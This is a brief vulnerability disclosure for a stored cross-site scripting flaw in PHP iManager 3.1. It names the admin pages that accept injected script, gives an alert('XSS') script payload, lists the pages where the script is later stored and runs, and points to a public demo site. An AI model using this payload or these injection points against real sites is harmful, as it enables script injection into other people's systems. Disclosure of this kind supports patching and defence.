PHP iManager version 3.1 suffers from a cross site scripting vulnerability.
e81325f7ff09504c3398994ecc429a4dd80fd571ca868034ab0eca0588fcac9d
----------------IN THE NAME OF ALLAH-------------------
# Discovered By Mr.Cicili
# PHP iManager 3.1 XSS Vulnerability
# Source Link : http://www.hotscripts.com/listing/php-imanager-3-1/
# Expl0it ---------->
http://localhost/imanager/admin/product.php
http://localhost/imanager/admin/customer.php
# PUT your scripts like : ********** alert("XSS")</script> On these pages ....
# YOur codes will be stored in these links --------->
...../imanager/admin/product_list.php
...../imanager/admin/customer_list.php
...../imanager/admin/new_invoice.php
...../imanager/admin/invoice_list.php
...../imanager/admin/invoice_list.php?paid=?
...../imanager/admin/search.php
# Demo : http://demo.deltascripts.com/imanager/admin/customer.php
# Iranian Dark Coders
Tnx : M.R.S.CO - black.king - b3hz4d - skote_vahshat - IrIsT - G3n3Rall - E2MA3N
4ut0n0m0us - SpooferNinja - Nafsh
-------------------------------------------------------